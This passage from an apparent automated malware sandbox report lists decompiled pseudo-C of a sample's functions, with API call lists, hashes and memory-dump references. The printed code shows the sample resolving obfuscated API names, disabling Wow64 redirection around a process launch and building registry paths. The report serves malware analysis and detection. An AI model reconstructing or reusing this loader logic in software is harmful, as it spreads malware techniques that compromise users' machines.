						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x309a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E030950CA(_t76);
				goto L12;
			}



















    0x030951b1
    0x030951b1
    0x030951bf
    0x030951c8
    0x030951cb
    0x030952dd
    0x030952e4
    0x030952e4
    0x030951da
    0x030951e2
    0x030951e7
    0x030951ea
    0x030951ff
    0x03095205
    0x03095206
    0x03095209
    0x0309520f
    0x03095212
    0x03095217
    0x0309521f
    0x03095226
    0x0309522d
    0x03095230
    0x030952c4
    0x03095236
    0x03095236
    0x0309523b
    0x03095242
    0x03095256
    0x0309525a
    0x030952ab
    0x0309525c
    0x0309525c
    0x03095263
    0x0309526a
    0x03095282
    0x03095288
    0x0309528c
    0x030952a6
    0x0309528e
    0x03095297
    0x0309529c
    0x0309529c
    0x0309528c
    0x030952bc
    0x030952bc
    0x03095230
    0x030952cb
    0x030952d4
    0x030952d8
    0x00000000

    APIs
      • Part of subcall function 03094F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,030951C4,?,?,?,?,00000000,00000000), ref: 03094F7F
      • Part of subcall function 03094F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03094FA1
      • Part of subcall function 03094F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03094FB7
      • Part of subcall function 03094F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03094FCD
      • Part of subcall function 03094F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03094FE3
      • Part of subcall function 03094F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03094FF9
    • memset.NTDLL ref: 03095212
      • Part of subcall function 03096343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0309522B,73797325), ref: 03096354
      • Part of subcall function 03096343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0309636E
    • GetModuleHandleA.KERNEL32(4E52454B,06D68D18,73797325), ref: 03095249
    • GetProcAddress.KERNEL32(00000000), ref: 03095250
    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0309526A
    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 03095288
    • CloseHandle.KERNEL32(00000000), ref: 03095297
    • CloseHandle.KERNEL32(?), ref: 0309529C
    • GetLastError.KERNEL32 ref: 030952A0
    • HeapFree.KERNEL32(00000000,?), ref: 030952BC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
    • String ID: Uxt
    • API String ID: 91923200-1536154274
    • Opcode ID: fb16a5c42b25786023c989baedcb675181a4fff295d2778b39ceacca7329991a
    • Instruction ID: 0b670af7131578aad41521cf4bdba4a632d793a47fec6081467baabdd9b9d186
    • Opcode Fuzzy Hash: fb16a5c42b25786023c989baedcb675181a4fff295d2778b39ceacca7329991a
    • Instruction Fuzzy Hash: 57318A71902219EFDF11EBA5DC88ADEBFB8FF4A300F104456E105EB110D735AA41DBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095927, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
    Download Yara Rule
    C-Code - Quality: 27%
    			E03095927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x309a38c; // 0x6d69ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E03094E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x30991ac;
				}
				_t46 = E030942F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E03096837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x309a2d4; // 0x3ccd5a8
						_t16 = _t75 + 0x309baa8; // 0x530025
						 *0x309a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E03094E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x30991b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E03096837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E030950CA(_v20);
						} else {
							_t66 =  *0x309a2d4; // 0x3ccd5a8
							_t31 = _t66 + 0x309bbc8; // 0x73006d
							 *0x309a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E030950CA(_v12);
				}
				return _v24;
			}




























    0x0309592f
    0x03095935
    0x0309593c
    0x03095942
    0x03095946
    0x0309594a
    0x0309594d
    0x03095954
    0x03095957
    0x03095959
    0x03095959
    0x03095962
    0x03095969
    0x0309596c
    0x03095972
    0x0309597c
    0x03095985
    0x0309598c
    0x030959a5
    0x030959ac
    0x030959af
    0x030959b8
    0x030959c1
    0x030959d2
    0x030959db
    0x030959df
    0x030959e3
    0x030959ea
    0x030959ed
    0x030959ef
    0x030959ef
    0x030959f9
    0x03095a02
    0x03095a09
    0x03095a21
    0x03095a25
    0x03095a62
    0x03095a27
    0x03095a2a
    0x03095a32
    0x03095a43
    0x03095a4f
    0x03095a57
    0x03095a5b
    0x03095a5b
    0x03095a25
    0x03095a6a
    0x03095a6f
    0x03095a76

    APIs
    • GetTickCount.KERNEL32 ref: 0309593C
    • lstrlen.KERNEL32(?,80000002,00000005), ref: 0309597C
    • lstrlen.KERNEL32(00000000), ref: 03095985
    • lstrlen.KERNEL32(00000000), ref: 0309598C
    • lstrlenW.KERNEL32(80000002), ref: 03095999
    • lstrlen.KERNEL32(?,00000004), ref: 030959F9
    • lstrlen.KERNEL32(?), ref: 03095A02
    • lstrlen.KERNEL32(?), ref: 03095A09
    • lstrlenW.KERNEL32(?), ref: 03095A10
      • Part of subcall function 030950CA: HeapFree.KERNEL32(00000000,00000000,03094239,00000000,00000001,?,00000000,?,?,?,03096B8D,00000000,?,00000001), ref: 030950D6
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: lstrlen$CountFreeHeapTick
    • String ID:
    • API String ID: 2535036572-0
    • Opcode ID: cc7f6cc6663faf576e1f9016e632a95cb9f40e047f1a2c1b187fcff1a5e49e40
    • Instruction ID: 5d0f7dde0d945beb5759fc6bb03753a4cfa592eb8bd8d20fc4719e23db42a994
    • Opcode Fuzzy Hash: cc7f6cc6663faf576e1f9016e632a95cb9f40e047f1a2c1b187fcff1a5e49e40
    • Instruction Fuzzy Hash: 3C416C76902218EFDF12EFA5DC44ADE7BB5FF88314F050056ED04A7221D7369A21EB94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0309624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
    Download Yara Rule
    C-Code - Quality: 64%
    			E0309624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x309a2d4; // 0x3ccd5a8
				_t1 = _t9 + 0x309b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E0309278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x6d69631
					_t40 = E03096837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E030949FE(_t33, _t34, _t40, _a8);
						E030950CA(_t40);
						_t42 = E03097565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E030950CA(_t36);
							_t36 = _t42;
						}
						_t43 = E030952E5(_t36, _t33);
						if(_t43 != 0) {
							E030950CA(_t36);
							_t36 = _t43;
						}
					}
					E030950CA(_t28);
				}
				return _t36;
			}















    0x0309624d
    0x03096250
    0x03096251
    0x03096258
    0x0309625f
    0x03096266
    0x0309626a
    0x03096271
    0x03096278
    0x0309627d
    0x03096285
    0x0309628f
    0x03096293
    0x03096297
    0x0309629d
    0x030962a2
    0x030962b2
    0x030962b4
    0x030962cb
    0x030962cf
    0x030962d2
    0x030962d7
    0x030962d7
    0x030962e0
    0x030962e4
    0x030962e7
    0x030962ec
    0x030962ec
    0x030962e4
    0x030962ef
    0x030962f4
    0x030962fa

    APIs
      • Part of subcall function 0309278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03096266,253D7325,00000000,00000000,?,00000000,030970D9), ref: 030927F3
      • Part of subcall function 0309278C: sprintf.NTDLL ref: 03092814
    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,030970D9,00000000,06D69630), ref: 03096278
    • lstrlen.KERNEL32(00000000,?,00000000,030970D9,00000000,06D69630), ref: 03096280
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • strcpy.NTDLL ref: 03096297
    • lstrcat.KERNEL32(00000000,00000000), ref: 030962A2
      • Part of subcall function 030949FE: lstrlen.KERNEL32(00000000,00000000,030970D9,00000000,?,030962B1,00000000,030970D9,?,00000000,030970D9,00000000,06D69630), ref: 03094A0F
      • Part of subcall function 030950CA: HeapFree.KERNEL32(00000000,00000000,03094239,00000000,00000001,?,00000000,?,?,?,03096B8D,00000000,?,00000001), ref: 030950D6
    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,030970D9,?,00000000,030970D9,00000000,06D69630), ref: 030962BF
      • Part of subcall function 03097565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,030962CB,00000000,?,00000000,030970D9,00000000,06D69630), ref: 0309756F
      • Part of subcall function 03097565: _snprintf.NTDLL ref: 030975CD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
    • String ID: =
    • API String ID: 2864389247-1428090586
    • Opcode ID: 174081f07d1710cbd5b29ca7e8ff80c0afc37f9aa861bfb08ba2a51b41913f1b
    • Instruction ID: db3b3fd329f6767a6a2b7de91da39077a3a119660f9682e3f844023f78ba5a63
    • Opcode Fuzzy Hash: 174081f07d1710cbd5b29ca7e8ff80c0afc37f9aa861bfb08ba2a51b41913f1b
    • Instruction Fuzzy Hash: 4911A73B503729776F12F7A99C44CAF76ADAEC65203054117F900EF100DE39C80267E0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03092902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
    Download Yara Rule
    APIs
    • SysAllocString.OLEAUT32(?), ref: 0309295E
    • SysAllocString.OLEAUT32(0070006F), ref: 03092972
    • SysAllocString.OLEAUT32(00000000), ref: 03092984
    • SysFreeString.OLEAUT32(00000000), ref: 030929E8
    • SysFreeString.OLEAUT32(00000000), ref: 030929F7
    • SysFreeString.OLEAUT32(00000000), ref: 03092A02
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: String$AllocFree
    • String ID:
    • API String ID: 344208780-0
    • Opcode ID: d8e2ee4bb932a58af1ffcc4fe7512013346e65805c369650f59bc611fc9947f0
    • Instruction ID: 5c94f5a48b817e56cd07cab388f42fe2f43b6c24a79e62f7d3fc051aa19d9339
    • Opcode Fuzzy Hash: d8e2ee4bb932a58af1ffcc4fe7512013346e65805c369650f59bc611fc9947f0
    • Instruction Fuzzy Hash: 6D315C32D01609AFDF41EFB8C844ADEB7BAAF89310F15442AED10EB150DB759906CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03094F5A, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E03094F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E03096837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x309a2d4; // 0x3ccd5a8
					_t1 = _t23 + 0x309b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x309a2d4; // 0x3ccd5a8
					_t2 = _t26 + 0x309b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E030950CA(_t54);
					} else {
						_t30 =  *0x309a2d4; // 0x3ccd5a8
						_t5 = _t30 + 0x309b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x309a2d4; // 0x3ccd5a8
							_t7 = _t33 + 0x309b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x309a2d4; // 0x3ccd5a8
								_t9 = _t36 + 0x309b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x309a2d4; // 0x3ccd5a8
									_t11 = _t39 + 0x309b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E03094248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















    0x03094f69
    0x03094f6d
    0x0309502f
    0x03094f73
    0x03094f73
    0x03094f78
    0x03094f8b
    0x03094f8d
    0x03094f92
    0x03094f9a
    0x03094fa1
    0x03094fa5
    0x03094fa8
    0x03095027
    0x03095028
    0x03094faa
    0x03094faa
    0x03094faf
    0x03094fb7
    0x03094fbb
    0x03094fbe
    0x00000000
    0x03094fc0
    0x03094fc0
    0x03094fc5
    0x03094fcd
    0x03094fd1
    0x03094fd4
    0x00000000
    0x03094fd6
    0x03094fd6
    0x03094fdb
    0x03094fe3
    0x03094fe7
    0x03094fea
    0x00000000
    0x03094fec
    0x03094fec
    0x03094ff1
    0x03094ff9
    0x03094ffd
    0x03095000
    0x00000000
    0x03095002
    0x03095008
    0x0309500d
    0x03095014
    0x0309501b
    0x0309501e
    0x00000000
    0x03095020
    0x03095023
    0x03095023
    0x0309501e
    0x03095000
    0x03094fea
    0x03094fd4
    0x03094fbe
    0x03094fa8
    0x0309503d

    APIs
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,030951C4,?,?,?,?,00000000,00000000), ref: 03094F7F
    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 03094FA1
    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 03094FB7
    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03094FCD
    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03094FE3
    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03094FF9
      • Part of subcall function 03094248: memset.NTDLL ref: 030942C7
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: AddressProc$AllocateHandleHeapModulememset
    • String ID:
    • API String ID: 1886625739-0
    • Opcode ID: 3f22abf0528646c5f5c9859c5c934983adac83e4ab54d65d69edf52d134d1b30
    • Instruction ID: 0096115aa1a0ffb8c96e497b535a26b444a9ae3fbb9984ff547aede3e13a0ce0
    • Opcode Fuzzy Hash: 3f22abf0528646c5f5c9859c5c934983adac83e4ab54d65d69edf52d134d1b30
    • Instruction Fuzzy Hash: 6A21D6B160230A9FEB50EF69DC84E9BB7ECFB48244B054127E418CB201E339E901DF60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03091D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E03091D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x309a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E03094AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E03097702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E030950CA(_a8);
						goto L29;
					}
					_t64 =  *0x309a2cc; // 0x6d69c98
					_t16 = _t64 + 0xc; // 0x6d69d8c
					_t65 = E03094AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d030990
						if(E03095F2A(_t97,  *_t33, _t91, _a8,  *0x309a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x309a2d4; // 0x3ccd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x309b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x309b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E03095927(_t69,  *0x309a384,  *0x309a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x309a2d4; // 0x3ccd5a8
									_t44 = _t71 + 0x309b86a; // 0x74666f53
									_t73 = E03094AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d030990
										E03091F7A( *_t47, _t91, _a8,  *0x309a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d030990
										E03091F7A( *_t49, _t91, _t99,  *0x309a380, _a16);
										E030950CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d030990
									E03091F7A( *_t40, _t91, _a8,  *0x309a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d030990
									E03091F7A( *_t43, _t91, _a8,  *0x309a380, _a16);
								}
								if( *_t101 != 0) {
									E030950CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d030990
					_t81 = E03096A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d030990
							E03095F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E030950CA(_t100);
						_t98 = _a16;
					}
					E030950CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E030977A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x309a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























    0x03091d57
    0x03091d60
    0x03091d67
    0x03091d6c
    0x03091dd9
    0x03091ddf
    0x03091de4
    0x03091deb
    0x03091df2
    0x03091df5
    0x03091f60
    0x03091f67
    0x03091f67
    0x03091f6c
    0x03091f6e
    0x03091f6e
    0x03091f77
    0x03091f77
    0x03091dfb
    0x03091e07
    0x03091f56
    0x03091f59
    0x00000000
    0x03091f59
    0x03091e0d
    0x03091e12
    0x03091e15
    0x03091e1c
    0x03091e1f
    0x03091e68
    0x03091e68
    0x03091e7b
    0x03091e85
    0x03091e8d
    0x03091e92
    0x03091e9c
    0x03091e9c
    0x03091e94
    0x03091e94
    0x03091e94
    0x03091e94
    0x03091ebe
    0x03091ec6
    0x03091ef4
    0x03091ef9
    0x03091f00
    0x03091f05
    0x03091f09
    0x03091f3b
    0x03091f0b
    0x03091f18
    0x03091f1b
    0x03091f2b
    0x03091f2e
    0x03091f34
    0x03091f34
    0x03091ec8
    0x03091ed5
    0x03091ed8
    0x03091eea
    0x03091eed
    0x03091eed
    0x03091f45
    0x03091f51
    0x03091f47
    0x03091f4a
    0x03091f4a
    0x03091f45
    0x03091ebe
    0x00000000
    0x03091e85
    0x03091e2e
    0x03091e31
    0x03091e38
    0x03091e3e
    0x03091e41
    0x03091e43
    0x03091e4f
    0x03091e52
    0x03091e52
    0x03091e58
    0x03091e5d
    0x03091e5d
    0x03091e63
    0x00000000
    0x03091e63
    0x03091d71
    0x00000000
    0x03091d98
    0x03091d98
    0x03091da4
    0x03091db7
    0x03091dbd
    0x03091dc5
    0x00000000
    0x03091dc5

    APIs
    • StrChrA.SHLWAPI(030930C2,0000005F,00000000,00000000,00000104), ref: 03091D8A
    • lstrcpy.KERNEL32(?,?), ref: 03091DB7
      • Part of subcall function 03094AA6: lstrlen.KERNEL32(?,00000000,06D69C98,770CC740,030913D0,06D69E9D,030955DE,030955DE,?,030955DE,?,63699BC3,E8FA7DD7,00000000), ref: 03094AAD
      • Part of subcall function 03094AA6: mbstowcs.NTDLL ref: 03094AD6
      • Part of subcall function 03094AA6: memset.NTDLL ref: 03094AE8
      • Part of subcall function 03091F7A: lstrlenW.KERNEL32(?,?,?,03091F20,3D030990,80000002,030930C2,03094106,74666F53,4D4C4B48,03094106,?,3D030990,80000002,030930C2,?), ref: 03091F9F
      • Part of subcall function 030950CA: HeapFree.KERNEL32(00000000,00000000,03094239,00000000,00000001,?,00000000,?,?,?,03096B8D,00000000,?,00000001), ref: 030950D6
    • lstrcpy.KERNEL32(?,00000000), ref: 03091DD9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
    • String ID: ($\
    • API String ID: 3924217599-1512714803
    • Opcode ID: 9792248a780dd6ca4a9621515a827d0b6215718d1c51cdc57d0a1cf81812931b
    • Instruction ID: 3b10e3e293c00e844bbbe80047bdfd9f8096e7a2b447bb6586e73953454aa31a
    • Opcode Fuzzy Hash: 9792248a780dd6ca4a9621515a827d0b6215718d1c51cdc57d0a1cf81812931b
    • Instruction Fuzzy Hash: B451793620220EAFEF26EF64DC40EEA77BAFF48310F048556F9159A061D739D921EB10
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03096BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
    Download Yara Rule
    C-Code - Quality: 32%
    			E03096BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E03092902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x309a2d4; // 0x3ccd5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x309b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x309b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x309a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















    0x03096be1
    0x03096be8
    0x03096bec
    0x03096bf1
    0x03096bf8
    0x03096bfb
    0x03096c05
    0x03096c0a
    0x03096c16
    0x03096c1d
    0x03096c27
    0x03096c27
    0x03096c1f
    0x03096c1f
    0x03096c1f
    0x03096c1f
    0x03096c2d
    0x03096c30
    0x03096c38
    0x03096c3b
    0x03096c3e
    0x03096c41
    0x03096c46
    0x03096c4f
    0x03096c5c
    0x03096c51
    0x03096c57
    0x03096c57
    0x03096c62
    0x03096c62
    0x03096c6a

    APIs
      • Part of subcall function 03092902: SysAllocString.OLEAUT32(?), ref: 0309295E
      • Part of subcall function 03092902: SysAllocString.OLEAUT32(0070006F), ref: 03092972
      • Part of subcall function 03092902: SysAllocString.OLEAUT32(00000000), ref: 03092984
